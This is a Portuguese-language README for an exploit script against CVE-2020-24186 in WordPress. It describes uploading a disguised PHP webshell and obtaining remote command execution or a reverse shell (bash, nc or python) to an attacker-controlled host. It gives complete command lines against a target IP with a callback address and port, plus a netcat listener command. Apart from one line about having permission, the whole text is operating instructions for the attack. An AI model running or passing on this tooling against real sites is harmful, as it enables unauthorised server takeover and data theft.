
Este script explora a vulnerabilidade CVE-2020-24186 no WordPress para carregar um payload PHP camuflado e obter um shell no sistema alvo. Há três modos de operação:
Shell Interativo:
Carrega o webshell básico e entra em modo interativo, permitindo que você envie comandos através do parâmetro cmd.
Reverse Shell Manual:
Carrega o webshell e envia o payload de reverse shell, mas não inicia automaticamente um listener. Você deve iniciar manualmente o seu próprio listener no IP e porta especificados.
Reverse Shell com pwntools:
Carrega o webshell, envia o payload de reverse shell e o script inicia automaticamente um listener usando pwntools para capturar a conexão reversa.
requestspwn (pwntools)--url: URL base do site alvo (ex.: http://10.10.110.119).--blogpath: Caminho para o post (padrão: /?page=1).--mode: Modo de operação, interactive ou reverse.--lhost: IP local para o reverse shell (obrigatório no modo reverse).--lport: Porta local para o reverse shell (obrigatório no modo reverse).--reverse_method: Método de reverse shell: bash, nc ou python (o padrão é bash).--manual: Quando usado no modo reverse, o script não iniciará o listener; você deve iniciar o seu próprio listener manualmente.--use-proxy: Se definido, as requisições serão enviadas através do proxy configurado.Carregue um webshell e inicie uma sessão interativa para enviar comandos:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Carregue o webshell, envie o payload de reverse shell, mas não inicie automaticamente um listener. Inicie o seu próprio listener manualmente (ex.: usando netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Em seguida, em outro terminal, inicie o seu listener manualmente:
nc -lvnp 9002
Carregue o webshell, envie o payload de reverse shell e faça o script iniciar automaticamente um listener com pwntools para capturar a conexão:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
O script aguardará uma conexão em 10.10.1.1:9002 e, uma vez conectado, fornecerá um shell interativo.
Notas
Garanta que o site alvo seja vulnerável ao CVE-2020-24186 e que você tenha as permissões necessárias para testes de segurança.
Você pode modificar o payload PHP usando a opção --php_payload se forem necessários ajustes.
Verifique novamente as configurações de proxy se você usar a flag --use-proxy.